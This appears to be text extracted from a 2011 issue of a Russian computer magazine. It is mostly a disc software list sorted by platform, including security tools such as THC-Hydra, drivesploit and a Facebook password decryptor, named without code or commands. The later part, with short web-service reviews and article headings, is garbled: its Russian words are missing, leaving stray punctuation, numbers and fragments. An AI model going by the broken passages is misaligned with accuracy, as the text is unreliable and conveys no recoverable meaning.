ZenKEY 2.3.5

>>WINDOWS
>Development
Android SDK r09
BinVis
BlueGriffon 0.9RC1
Code Visualizer 4.6
DbOctopus 1.1
Dependency Walker 2.2
Developer's Tips & Tricks 1.2.1.2
Free Hex EditorNeo 4.95
GalaXQL 2.0
Gobby 0.4.93
Google App Engine documentation
Google App Engine SDK for Java
1.4.0
Google App Engine SDK for Python
1.4.1
HeidiSQL 6.0
Parrot 3.0.0
PyCharm 1.1.1
Reflexil 1.1
RegexBuddy 3.5.0
RocketSVN for Visual Studio 1.0.1
RocketSVN Server 1.0
Sublime Text 2 beta
TOra 2.1.3
Virtual Serial Ports Beta
wyBuild 2.5

>>UNIX
>Devel
Bluefish 2.0
CImg 1.4.7
GanttProject 2.0.10
Giggle 0.5
Gitg 0.1.0
Gschem 1.6.2
Jailer 3.5.1
JuffEd 0.8.1
KDevelop 4.2
LibRaw 0.12.3
libusb 1.0.8
Mojolicious 1.0
Neptune 0.6
Okteta 0.5
PyCharm 1.1.1
SCons 2.0.1
SWIG 2.0.1
Talend Open Studio 4.1.2

>System
AS SSD Benchmark 1.6.4
Bluetooth Driver Installer 1.0.0.62
BootRacer 3.1
CheckDiskGUI 1.1.0
ESET SysInspector 1.2
FreeFileSync 3.13
Immunet Protect FREE Antivirus
JottiQ 1.0.3
Kaspersky Rescue Disk 10
Minimem 2.0
Npackd 1.14.1
OSFClone 1.0.1005
OSFMount V1.4.1005
OSForensics 0.8
Q-Dir 4.46
R.saver 1.0
Rainmeter 2.0

>Security
Adaptive Security Analyzer IIS
Buster Sandbox Analyzer 1.25
drivesploit
FacebookPasswordDecryptor 1.5
HashCompare 1.0
HTTPTunnel 1.2.1
IdaJava 0.3
MagicTree Beta Two
nmap 5.50
OpenFISMA 2.11
OWASP CSRFGuard 3.0.0.336 ALPHA
PacketFu 1.0.0
pyREtic 0.5.1
VIDigger v1.0
VirtualKD 2.5.1

Ekahau HeatMapper 1.1.2


LogMeIn Hamachi
NetworkMiner 1.0
Pamela Call Recorder 4.7
RoboForm 7.2.0
torchat 0.9.9
TYPO3Winstaller 4.5.0
WebSite-Watcher 2011 (11.0)

>Server
Apache 2.2.17
BIND 9.7.2-P3
Cassandra 0.7
Cherokee 1.0.18
CUPS 1.4.6
DHCP 4.2.0-P2
Drizzle 2011.02.09
MySQL 5.5.8

>Security
drivesploit
Inguma v.0.2
MagicTree Beta Two
Nchop v0.2
nmap 5.50
OpenDLP 0.2.5
OpenFISMA 2.11
OpenSCAP Project 0.6.7
OWASP CSRFGuard 3.0.0.336 ALPHA
PacketFu 1.0.0
pyREtic 0.5.1
Rootkit Hunter 1.3.8
THC-Hydra 6.0
THC-IPV6 1.4
Cross_fuzz
Digital Forensics Framework 0.9
Guardog 0.91
Inguma 0.2
Kismet 2011-01-R1
Linux Security Checklist Tool 2.0.3
Malmon Detection Tool 0.3
Mantra Security Toolkit
Marvin 0.9
Mausezahn 0.40
Nmap 5.50
NMapSi4 0.2.1
Packet Fence 2.0.1
Puck
QuickRecon 0.1.1
THC-Hydra 6.1
XSS Rays 1.0

>Net
CenterIM 4.22.10
Choqok 1.0
Frostwire 4.21.3
Google Chrome 8.0.552.237
I2P 0.8.3
Kfilebox 0.4.7
Lynx 2.8.7
Mozilla Firefox 3.6.13
msmtp 1.4.23
Naim 0.11.8.3.2
NcFTP 3.2.5
Newsbeuter 2.4
Opera 11.00
Psi 0.14
RoundCube Webmail 0.5
Twyt 0.9.2
Vuze 4.6
WeeChat 0.3.4

>Games
PokerTH 0.8.2

>>MAC
AppCleaner 1.2.2
Candybar 3.2.2
Daisy Disk 2.0.5
FreeGuide 0.11
iMedia Browser 2.0
LiteIcon 1.3.1
LittleIpsum 1.1.2
MiroVideoConverter 2.4
Pixelmator 1.6.4
Punto Switcher 3.1.1
RapidWeaver 5
Reeder 1.0b9
Screenography 1.0.15
SecondBar 9.68
SecureFiles 1.1.2
Sigma Chess 6.2
SiteSucker 2.2.3
TinkerTool 4.4
WeatherDock 2.5.1

>X-distr
Debian 6.0 Squeeze

>System
ATI Catalyst 11.1
Capivara 0.8.9
Create Synchronicity 5.1
Dmidecode 2.11
GConf 2.32
Kdf 4.0.5
Linux Kernel 2.6.37
LVM2 2.02.81
nVidia 260.19.36
Palimpsest 2.32
phpVirtualBox 4.2
PowerTop 1.13
Virtual Machine Manager 0.8.6
VirtualBox 4.0.2
xSMBrowser 3.4.0

OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.4
Postfix 2.8.0
PostgreSQL 9.0.3
Samba 3.5.6
Sendmail 8.14.4
Squid 3.1.10
Unbound 1.4.8
Vsftpd 2.3.2

03(146) 2011

. 22

. 28

. 44


WINDOWS



: 2
10
.

MySQL

HACKQUEST 2010
RETURN-ORIENTED ROOTKITS
NAS

APPLESCRIPT
PYTHON

03 (146) 2011

PALEVO: C . 74

UNITS

HTTP://WWW2

JavaScript-

ONLINE DATABASE
SCHEMA
DESIGNER
dbdsgnr.appspot.com

JAVASCRIPT UNPACKER
AND
BEAUTIFIER
jsbeautifier.org

, .
, .
, Python Google App Engine, .
, ,
,
PostgreSQL, SQLite, MySQL, MSSQL Oracle.

JavaScript , ,
-, . WWW2
- JScrambler, . JSBeautifier, ,
JS- ,
,
.


IM Skype

BAMBUSER
bambuser.com

SIMKL
simkl.com

:
? ,
/? :). , 3 000
, Wi-Fi . ,
? Bambuser.
( Windows Mobile, Android, iOS, Symbian, Bada),
Bambuser.
.

, - GTalk
IM-, . .
Simkl, . ,
, QIP, Miranda,
Pidgin .
Skype ( SkypeIn SkypeOut),
.

144

X 03 /146/ 2011

>> coding

3 -
: 12 , 6
3 .

, ? ? .
- .